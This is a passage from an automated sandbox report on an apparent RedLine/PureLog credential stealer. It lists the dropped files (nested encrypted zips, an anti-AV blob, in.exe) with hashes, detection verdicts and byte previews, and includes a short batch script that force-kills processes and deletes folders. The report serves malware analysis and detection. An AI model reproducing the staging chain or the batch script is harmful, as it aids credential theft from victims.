SHA-512:	9EADB3D584D153842C45FE9EEBE0DB479D4C0367049E7B1FA0231C7979B38F3E8D0505B46FCD8D9238AE751905056390CF84253717F131F924C1085DF31471D1
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ......,.....0l.......q.... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IDW.r....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDWUl....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDWUl....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDWUl..........................."&.A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.+ .chrome.exe..F......CW.VDW.r..........................,.6.c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.;.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.!.-.-.p.r.o.x.y.-.s.e.r.v.e.r

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\in.exe.log

Process:	C:\Users\user\AppData\Local\Temp\main\in.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3274
Entropy (8bit):	5.3318368586986695
Encrypted:	false
SSDEEP:	96:iqlYqh3oIqxwCtI6eqzxP0aymRLKTqdqlq7qqjqcEZ5D:iqlYqh3LqxwCtI6eqzxP0at9KTqdqlqY
MD5:	DB935B492A78CA89E32C1468CD0BC3C2
SHA1:	35C71D134C6B3DFB133CED4FB9522458DA6F3CB3
SHA-256:	8E165F9C5DD16147DAA8BA77E1B711AF5C196707D19B38C98841DD3D8F679C7E
SHA-512:	5454886BEF6CCF6A5795BA281940A7CDE8B332A44FF68F1167C2A7429764D01BF43028955292D0072949B270EAEE625C7A7158FAAB9C6B92A569F0597DCA0DD7
Malicious:	false
Reputation:	low
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Temp\Tmp30F7.tmp

Process:	C:\Users\user\AppData\Local\Temp\main\in.exe
File Type:	data
Category:	dropped
Size (bytes):	2662
Entropy (8bit):	7.8230547059446645
Encrypted:	false
SSDEEP:	48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
MD5:	1420D30F964EAC2C85B2CCFE968EEBCE
SHA1:	BDF9A6876578A3E38079C4F8CF5D6C79687AD750
SHA-256:	F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
SHA-512:	6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	0..b...0.."...H..............0...0......H..............0...0......H............0...0....H.......0...p.,\|.(.............mW.....$\|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%...X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...\|B.d..kr.=G.g.v..f.d.C.?...0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..\|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....\|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

C:\Users\user\AppData\Local\Temp\Tmp3107.tmp

Process:	C:\Users\user\AppData\Local\Temp\main\in.exe
File Type:	data
Category:	dropped
Size (bytes):	2662
Entropy (8bit):	7.8230547059446645
Encrypted:	false
SSDEEP:	48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
MD5:	1420D30F964EAC2C85B2CCFE968EEBCE
SHA1:	BDF9A6876578A3E38079C4F8CF5D6C79687AD750
SHA-256:	F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
SHA-512:	6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
Malicious:	false
Preview:	0..b...0.."...H..............0...0......H..............0...0......H............0...0....H.......0...p.,\|.(.............mW.....$\|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%...X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...\|B.d..kr.=G.g.v..f.d.C.?...0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..\|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....\|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

C:\Users\user\AppData\Local\Temp\main\7z.dll

Process:	C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1679360
Entropy (8bit):	6.278252955513617
Encrypted:	false
SSDEEP:	24576:S+clx4tCQJSVAFja8i/RwQQmzgO67V3bYgR+zypEqxr2VSlLP:jclmJSVARa86xzW3xRoyqqxrT
MD5:	72491C7B87A7C2DD350B727444F13BB4
SHA1:	1E9338D56DB7DED386878EAB7BB44B8934AB1BC7
SHA-256:	34AD9BB80FE8BF28171E671228EB5B64A55CAA388C31CB8C0DF77C0136735891
SHA-512:	583D0859D29145DFC48287C5A1B459E5DB4E939624BD549FF02C61EAE8A0F31FC96A509F3E146200CDD4C93B154123E5ADFBFE01F7D172DB33968155189B5511
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: LisectAVT_2403002A_166.exe, Detection: malicious, Browse Filename: LisectAVT_2403002A_166.exe, Detection: malicious, Browse Filename: installer.exe, Detection: malicious, Browse Filename: conhost.exe, Detection: malicious, Browse Filename: Software1.30.1.exe, Detection: malicious, Browse Filename: u841TF5Qex.exe, Detection: malicious, Browse Filename: Laun3cher_E@zy.exe, Detection: malicious, Browse Filename: 8oPNV681Qw.exe, Detection: malicious, Browse Filename: hZE4solQRQ.exe, Detection: malicious, Browse Filename: d5raNaLQ8Q.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w...$...$...$.&.$...$.&.$...$...$...$.&.$%..$.&.$..$.&G$...$.&.$...$.&.$...$.&.$...$Rich...$........................PE..d.....n\.........." .........H...............................................P............`.............................................y...l...x........{...p.......................................................................................................text............................... ..`.rdata..9...........................@..@.data...............................@....pdata.......p... ..................@..@.rsrc....{.......\|..................@..@.reloc...0.......2...n..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\main\7z.exe

Process:	C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	468992
Entropy (8bit):	6.157743912672224
Encrypted:	false
SSDEEP:	6144:fz1gL5pRTMTTjMkId/BynSx7dEe6XwzRaktNP08NhKs39zo43fTtl1fayCV7+DHV:r1gL5pRTcAkS/3hzN8qE43fm78V
MD5:	619F7135621B50FD1900FF24AADE1524
SHA1:	6C7EA8BBD435163AE3945CBEF30EF6B9872A4591
SHA-256:	344F076BB1211CB02ECA9E5ED2C0CE59BCF74CCBC749EC611538FA14ECB9AAD2
SHA-512:	2C7293C084D09BC2E3AE2D066DD7B331C810D9E2EECA8B236A8E87FDEB18E877B948747D3491FCAFF245816507685250BD35F984C67A43B29B0AE31ECB2BD628
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........(...{...{...{...{...{...{...{...{...{...{...{...{...{..!{...{...{...{...{...{Rich...{................PE..d.....n\.........."..........l...... .........@...........................................`.....................................................x....`..........,a...........p.......................................................... ............................text............................... ..`.rdata..............................@..@.data....,..........................@....pdata..,a.......b..................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\main\KillDuplicate.cmd

Process:	C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	222
Entropy (8bit):	4.855194602218789
Encrypted:	false
SSDEEP:	6:vFuj9HUHOPLtInnIgvRY77flFjfA+qpxuArS3+xTfVk3:duj9HeONgvRYnlfYFrSMTtk3
MD5:	68CECDF24AA2FD011ECE466F00EF8450
SHA1:	2F859046187E0D5286D0566FAC590B1836F6E1B7
SHA-256:	64929489DC8A0D66EA95113D4E676368EDB576EA85D23564D53346B21C202770
SHA-512:	471305140CF67ABAEC6927058853EF43C97BDCA763398263FB7932550D72D69B2A9668B286DF80B6B28E9DD1CBA1C44AAA436931F42CC57766EFF280FDB5477C
Malicious:	false
Preview:	Cd /d %1..Rd "%SfxVarApiPath%"..For /f "Tokens=1,2 Delims=," %%I In ('TaskList /fo CSV /nh') Do (.. If %%I==%2 (.. Set /a N+=1.. Set PID=%%~J.. )..)..If %N% EQU 1 Rd /s /q %1..If %N% GTR 1 TaskKill /pid %PID% /t /f

C:\Users\user\AppData\Local\Temp\main\extracted\AntiAV.data

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	2335339
Entropy (8bit):	5.897999492198445
Encrypted:	false
SSDEEP:	24576:5yZBPkpRrP9pxC+XvoflcYy36s3vb0EecYy37n92k8GtGAQZ67hR7krC/Cyf0/xE:R9kqGu7okoZscCnf0/Zs9D
MD5:	916E2689C5B5A98A0539A068C8E48088
SHA1:	8A4D9C0C0F4E0A2375D916B60D7DE7047C42B2E9
SHA-256:	9A591139A095B056070DE3B557325FD82783712252F394DAC912485881DB304E
SHA-512:	56436800823435210995352296C0263871CD7F750D28C394B8588978057455114FB7CC619A237C2C5699D83A0C861011AD2B938182F4ECB038BC4112A0C9D173
Malicious:	false
Preview:	KmO6sb9bzFlO6QmlyBR3cUuBrPdmJRJBhXshklfui2fRJCiITlYNEM2EqC9x9I0qVq7CGnIhkwh6hvGvu5pkfBRaoLATG90WNTmCTDFIBTSnd7l9KiCxIUJ5zlBvrKkHZaxyJb0N052Q1AaMDCASX2cw1ZaV1bKcufYPprTSqVIRscgIruKC2MOUPLxNBR1egyVxwSbedVhVl89lRxHAMRMf16G6Ry1TTz7dOtnEaLQowPwuw8eDnR20ZOyf9yYTVcpDsiS4K2VzryfyiwiOXZDq7UaTFrtOgtVQzuNXN74O8xkfvt4Ykzxcs60WfAkGZKsYbwZWS4bPPY8cze1vDL6leHmcDUIbsBvTleZtzGhgeYGdRaUmv5ljenoBZOBDIndh9KTa7zBVHuP4jAK8C2IKaB5BgFReYTleqD0cCkhTdxbkQAMwHPuKktcCRORGmFfE37OzhnpNUtRyIHoGBwau6RcKp6vTNwIWRMkDjZaejD2NS5TCgRvcwgZcldKIAtOqIN0TXMXlnX6scNgHltMTvvwSZbBsDdCGRINZlutVfbP6joQl5sw21ICykYYYKwRfLlfpREpOzuAjwo7oC8hJ4Tv652auJh1RujdaLcIfX5oB1GDuu95ojl52qB08Lzg7nIl7yDb4k9X8rUPZ857XTGTaXkhL77wwG75hAnvfazjbPfP5GZrDYRdhe2I0zSJZuV5aaWd5Imf8Ck0w9ALkKR7xhRlclC4FnJOBuXxpdcsG9gE8tgukaoXpzf4z0CHJ0VOfBNcErBEPyoWMZfee3Vfg2NyLVPvaC6c5HNC1mZSr0SpB1RAlj2w7ST9eZL5DUYwl8p6flt6I3p7MBJrZLlY3LgBSr5F4BYYU6sebHdx0ES2Ci6J9wBw0wGLCy8SeSDS45pkrvWvTZkvW2oFTNBda3aYJyut0zJi1Chjp4xQkH1cEMWZUOy7MueiWNcfeKZqM4Gg2hr7XoLoTQXyvcXvxeOwXoXJKXvu4

C:\Users\user\AppData\Local\Temp\main\extracted\file_1.zip

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	609442
Entropy (8bit):	7.999002323328906
Encrypted:	true
SSDEEP:	12288:Bn4iXhJ6TPX2bBlP2nTgxJDpK6MLjvETZUUZDSV1MfXdSbgMyQfPVQOTtl8OCJ:VxJ6L2bnP2ncxJDpijgRDSvMf9MyCQOC
MD5:	E8B7D80AB2F79EFE1BD3D1A81C06BF6D
SHA1:	40741AD3E338CE10A13CD98E91A54A09CB22A8FD
SHA-256:	94BC8E86EE39E4E5409083A5E69E47B99780FEF994858BAF0345AD88B071E9F8
SHA-512:	9BAFEB3B70526AF629BC1B042C8D3E4EB77281D04C2DF703E3C3F4644F3D6D7DF3F5FA51C9D2F67206EB3A083575310C134DA87764E7FA49EB3DE3E91BA78D8F
Malicious:	false
Preview:	PK...........X.....L..........in.exe.].x.E...kI..$^P.....D.!bD....!..$ ..`..(.bAE.C.."v)...+.OQ.;.+...w;ws3w..M...3....7o.);.ff9..,....6mbl1s..3._. ..\|.@.+...W..w...{L..!..F....5...XeW..e..e.8.X{.......(d.....`.g<2%!.#...]...1...i...X3.qp.z.4.\|...G......'=....9r_x.....g......I..#\|hJ.sm..x..V...j..8.suM. ...).Kxn.j.k,.\]5b4..1...7.u..u5W.]..FIB.......`...0...b/].f.....Zv....-l..z.R..AF=.@B.....{......F.S=L\|"....O.M.6..".........c.h.....<{m.4....OM.h1....9.-....j..S....J.s.....#.n...fI..&......p..Eu..........v..$[...@.O+<.#.8.P......E(s+..h.t]..\|.J.C<R...s..8V..xV.(<....J9.....2.J..%/.......i"u..z.....%.-.}..%xr.g.K..o.....6..].\|.O.d[3.......*....o[.......~...J............3..........r.t.p.... ..lV...W.....T...A....4..6.p8....!..w...}0`1GMp.(O...[..Q.ATv......X.Q..........,.l......}..e..b`W4@.<....5.=.].M. {2..do.`s...v_Z.u......Q...p............+2:.;z.......j...6.3..Ge..\....O....#._/..}....g..Z%R}.=.q.....m../.iL...."..'K.'.....wx.

C:\Users\user\AppData\Local\Temp\main\extracted\file_2.zip

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	609596
Entropy (8bit):	7.999010327422088
Encrypted:	true
SSDEEP:	12288:3n4iXhJ6TPX2bBlP2nTgxJDpK6MLjvETZUUZDSV1MfXdSbgMyQfPVQOTtl8OCd:vxJ6L2bnP2ncxJDpijgRDSvMf9MyCQO6
MD5:	F59C5F88B141450FCA78896B7EDFB95F
SHA1:	9EEC844527E9420417CC227ED9D95D9522C71FA2
SHA-256:	434D4132E27F2740C59E78C615703C1D55850123F76F1684A5BBBE1CFDE1CFF8
SHA-512:	C49A67CB05B90F26C4B03E586074A720E8A2152364422D31E3A4E94342A7D060459FDCA2D1342E9B9D468A7976E3D83ADD089F6B99814B0E1AA8B5EC4474EA3F
Malicious:	false
Preview:	PK...........X...B.L...L......file_1.zipPK...........X.....L..........in.exe.].x.E...kI..$^P.....D.!bD....!..$ ..`..(.bAE.C.."v)...+.OQ.;.+...w;ws3w..M...3....7o.);.ff9..,....6mbl1s..3._. ..\|.@.+...W..w...{L..!..F....5...XeW..e..e.8.X{.......(d.....`.g<2%!.#...]...1...i...X3.qp.z.4.\|...G......'=....9r_x.....g......I..#\|hJ.sm..x..V...j..8.suM. ...).Kxn.j.k,.\]5b4..1...7.u..u5W.]..FIB.......`...0...b/].f.....Zv....-l..z.R..AF=.@B.....{......F.S=L\|"....O.M.6..".........c.h.....<{m.4....OM.h1....9.-....j..S....J.s.....#.n...fI..&......p..Eu..........v..$[...@.O+<.#.8.P......E(s+..h.t]..\|.J.C<R...s..8V..xV.(<....J9.....2.J..%/.......i"u..z.....%.-.}..%xr.g.K..o.....6..].\|.O.d[3.......*....o[.......~...J............3..........r.t.p.... ..lV...W.....T...A....4..6.p8....!..w...}0`1GMp.(O...[..Q.ATv......X.Q..........,.l......}..e..b`W4@.<....5.=.].M. {2..do.`s...v_Z.u......Q...p............+2:.;z.......j...6.3..Ge..\....O....#._/..}....g..Z%

C:\Users\user\AppData\Local\Temp\main\extracted\file_3.zip

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	609720
Entropy (8bit):	7.999444761789847
Encrypted:	true
SSDEEP:	12288:WxZUs/PTmZBlFs1T8dVLpEO+L5paJZ6UzrSD1MRXdS58MO8fPNQEp9p8gkcp:ZszmZnFs1QdVLp450prSBMRLMOcQE6gf
MD5:	E150123E0B94B1BBE4C37658A6609FFD
SHA1:	B8EF74C6EBBC98126127E6269007DFEC2012717E
SHA-256:	ED83E61A381B166E258CA4CB89F5B4539E7461ABEDB15632F7434CC300F1301A
SHA-512:	C884CA654A0CEF6CE611CF9F770424B9D1654B663CFEA4083A73329E5EF86EE2A78755BC65DC3F1AF1C81FEEAC82FC2062053AF579756157B1961F6DD1975F8D
Malicious:	false
Preview:	PK...........X..u..M..<M......file_2.zip.&,..PK...........X...B.L...L......file_1.zipPK...........X.....L..........in.exe.].x.E...kI..$^P.....D.!bD....!..$ ..`..(.bAE.C.."v)...+.OQ.;.+...w;ws3w..M...3....7o.);.ff9..,....6mbl1s..3._. ..\|.@.+...W..w...{L..!..F....5...XeW..e..e.8.X{.......(d.....`.g<2%!.#...]...1...i...X3.qp.z.4.\|...G......'=....9r_x.....g......I..#\|hJ.sm..x..V...j..8.suM. ...).Kxn.j.k,.\]5b4..1...7.u..u5W.]..FIB.......`...0...b/].f.....Zv....-l..z.R..AF=.@B.....{......F.S=L\|"....O.M.6..".........c.h.....<{m.4....OM.h1....9.-....j..S....J.s.....#.n...fI..&......p..Eu..........v..$[...@.O+<.#.8.P......E(s+..h.t]..\|.J.C<R...s..8V..xV.(<....J9.....2.J..%/.......i"u..z.....%.-.}..%xr.g.K..o.....6..].\|.O.d[3.......*....o[.......~...J............3..........r.t.p.... ..lV...W.....T...A....4..6.p8....!..w...}0`1GMp.(O...[..Q.ATv......X.Q..........,.l......}..e..b`W4@.<....5.=.].M. {2..do.`s...v_Z.u......Q...p............+2:.;z....

C:\Users\user\AppData\Local\Temp\main\extracted\file_4.zip

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	2273813
Entropy (8bit):	7.998455557939854
Encrypted:	true
SSDEEP:	49152:4ujCK3D0AC/l5mwbBkDWYb1ZN4UJ9o/Zszm1FUELpZW/v6D:4aR3D0Ae5mwdkDWm1Xoym7e/O
MD5:	1EBECBD9E101E1E4830705FB45D8543F
SHA1:	8038EE888C6F3E5D5E1BEE482361BD5975D05B4A
SHA-256:	7F9C40F91877AF8611D9045E9C4262C3F67E4313C09BCB1787D1F629D6C26657
SHA-512:	B1DADB963FB4A0F4FA818A5907703D968EA2C9A4E58DD7058DC5B4936E4B032624C2C8039E40FA39D2E7847D11D05EFCDCE801097DEB69A64DDD96AC549F1612
Malicious:	false
Preview:	PK...........X..x.=c..k.#.....AntiAV.data..E..@.D..C/qwg..;...mG.3H..\|...$..}.`..8......lV1..4...Cu.H.(l+{Cl.:........$+Nr....\.u.K_1N:k.'....F...... .....+.70..R.>..A..#6L.:..n..7......Y..y......v.,....=...e....fe.4.@...h..+....=.#...T......A..\|...{A.p{.b*.\|.[...Q...z.v.....iD.....W.....;...........YVL._._.F..4./g;syC.....e,.N..>t.43..p.T4?.K.....:Z.XDVS.gj.)cp..A9.7^.d.M.d.j..c:.(T<J._3-..8.,."s.'...B\.q...\..e.!..{l.\.]'.P.2}..l@^.G...{n..p..u.n.1;W..#..p.A.YD7.....,.o..z;.6T../.w..=.3K5..]............U...,r....n....(..I.....Q.o%.NF..Q.h$y.".7.tU..eVe.b.q.S4%"C..$g..iX..XQl..?Z.U.\|.g....&.d..Y.\|..5O...s.\|..A..@.Y1F.o.o.s.'UY.AU#....D.K.....A....=t.M..L4...{.....BF.Rg.-...j..p.c..'.2....].m..w37t...Rn.r....v....W..g0E......)-.6.=v/.9...o..~.mh.U.&...5.ld4k.gG.G.S.w4G..]'.5......r..Q.U.U.9.Vv....2.>....p.s.p..e....(..}Jox.....Z..[Y..ku.....5....s.././....:...v......h.u.ZlG.>).,.(....Ye<.....3...:T:)...-).=.L.=.2F....&H7..j..\.B6.Ox.\....

C:\Users\user\AppData\Local\Temp\main\extracted\in.exe

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	912896
Entropy (8bit):	6.91142180340863
Encrypted:	false
SSDEEP:	24576:nMids7o3onI9JrpEjMzDSNMfhM0eQsqas:n7KoIyrpdsPBqa
MD5:	E8937B534F6C730C0A82793CCDDC0692
SHA1:	564BE62115F50DFA5D577C484C53B49A9F23D00D
SHA-256:	2904D8F82287362442C4485412330439EBEDE37D0834E8A54BB9DB188A8123D4
SHA-512:	C16578A9BA12994178AB5A3D42B7A827E0D4464E533C951D269F161F11C9033B87CD8754FA81EB07FA43E21233E03458FEE67970B59FBEB21F07B93B1FFCCBD9
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.. ...........>... ...@....@.. .......................@............@..................................>..K....@....................... ....................................................... ............... ..H............text........ ... .................. ..`.rsrc........@......."..............@....reloc....... ......................@..B.................>......H.......,...H...........tV......>.......................................0.......... ........8........E........i...u.......)...=...8....8j... ....~....{....:....& ....8....~....:A... ....8....(.... .... .... ....s....(........ ....8z...r...ps....z....(....(.... ....<.... ....~....{....:B...& ....87......... ....8'.....0..........(.... ........8........E........N..........8....*(.... ....~....{o...9....& ....8....(.... ....~....{f...9....& ....8....(.... ....~....{....:....&

C:\Users\user\AppData\Local\Temp\main\file.bin

Process:	C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	2273979
Entropy (8bit):	7.999914742624508
Encrypted:	true
SSDEEP:	49152:kiDOyrn4cq0kao0r7D3ncd7gyP1KhxljzQA8H2ZBIdqit:SV0no0S/PAVZ+3t
MD5:	EA47839FFE04168028932250CCE39DA3
SHA1:	5F137402C577C82CA93FFEB8381141E6ABC42D5A
SHA-256:	21B777B5BCF3B3C0D1569802F2D68A9B27C91C5EEFA60C3814A0DFB0452D2E75
SHA-512:	3D3C8085BC8990D9DB4CE48216ED0CEC9969A19B87EB1603FA62FADF17A1F6F898F8872AFF3ACCE4A5C2290C63D4DB2F03F25314EFD901A6BDDC59CBE474B0FB
Malicious:	false
Preview:	PK...........Xv2..!."...".....file_4.zip.(`..xs....h...=pS..9..[B.....3..`2w.......-9.mH...DK.{..E.?.-.kJ.] -..zX6.....j.$......%0d...M.f.R...U.'z.@.\......5.....jW...U......jZ......... ...WA....0:ip-/s.4..w...;.......M...gD.c..].[h=..d~4wR.]d.....%.G"].CR..........$.Z.w.......:.......h..TI1.U..?....f7\.~...c_g.UM...I@\|....[#$.Hl...?z...c...j...t.....?.1/...$..(.B:......F..V....].l.>......k..h.....U.X.V...Z..`.b..H9.ub..c..i...(zEsnR~+..>..VbxK..m...T.B...t...=B.....................\|..K. ..J..m}........,g....m.$O~/.^..j..0..k'!fu.P.0.9.x.v.s...%...SW.q.0u.j;...T..%.W.b.?...[^.?...f.W_!SZ...T...B...9SJ.3M..:.q.E9...[.$og....V.Um0....=tu...Mn^.xR&...>..t.;JRv..5e.~. }.v...<. ...G...^....u.~[..?.J...Ok..!l.J....V.K..6.%t"N.......O..wl$..jn8,..B.p....y.W.31.Z5.\...;..]_H......R....2)...(.j.....+..k.r../oiuf...].;\l............!K.....\[p....L..2x...w...H.FDH9.5gE.d.6kL..R...i..xq..?.\...td)B~.<{{..H.Gk'.._..i...u0....b.I.#{2..9y..w....:..F

C:\Users\user\AppData\Local\Temp\main\file.zip (copy)

Process:	C:\Windows\System32\cmd.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	2273979
Entropy (8bit):	7.999914742624508
Encrypted:	true
SSDEEP:	49152:kiDOyrn4cq0kao0r7D3ncd7gyP1KhxljzQA8H2ZBIdqit:SV0no0S/PAVZ+3t
MD5:	EA47839FFE04168028932250CCE39DA3
SHA1:	5F137402C577C82CA93FFEB8381141E6ABC42D5A
SHA-256:	21B777B5BCF3B3C0D1569802F2D68A9B27C91C5EEFA60C3814A0DFB0452D2E75
SHA-512:	3D3C8085BC8990D9DB4CE48216ED0CEC9969A19B87EB1603FA62FADF17A1F6F898F8872AFF3ACCE4A5C2290C63D4DB2F03F25314EFD901A6BDDC59CBE474B0FB
Malicious:	false
Preview:	PK...........Xv2..!."...".....file_4.zip.(`..xs....h...=pS..9..[B.....3..`2w.......-9.mH...DK.{..E.?.-.kJ.] -..zX6.....j.$......%0d...M.f.R...U.'z.@.\......5.....jW...U......jZ......... ...WA....0:ip-/s.4..w...;.......M...gD.c..].[h=..d~4wR.]d.....%.G"].CR..........$.Z.w.......:.......h..TI1.U..?....f7\.~...c_g.UM...I@\|....[#$.Hl...?z...c...j...t.....?.1/...$..(.B:......F..V....].l.>......k..h.....U.X.V...Z..`.b..H9.ub..c..i...(zEsnR~+..>..VbxK..m...T.B...t...=B.....................\|..K. ..J..m}........,g....m.$O~/.^..j..0..k'!fu.P.0.9.x.v.s...%...SW.q.0u.j;...T..%.W.b.?...[^.?...f.W_!SZ...T...B...9SJ.3M..:.q.E9...[.$og....V.Um0....=tu...Mn^.xR&...>..t.;JRv..5e.~. }.v...<. ...G...^....u.~[..?.J...Ok..!l.J....V.K..6.%t"N.......O..wl$..jn8,..B.p....y.W.31.Z5.\...;..]_H......R....2)...(.j.....+..k.r../oiuf...].;\l............!K.....\[p....L..2x...w...H.FDH9.5gE.d.6kL..R...i..xq..?.\...td)B~.<{{..H.Gk'.._..i...u0....b.I.#{2..9y..w....:..F

C:\Users\user\AppData\Local\Temp\main\main.bat

Process:	C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe
File Type:	Unicode text, UTF-16, little-endian text, with no line terminators
Category:	dropped
Size (bytes):	438
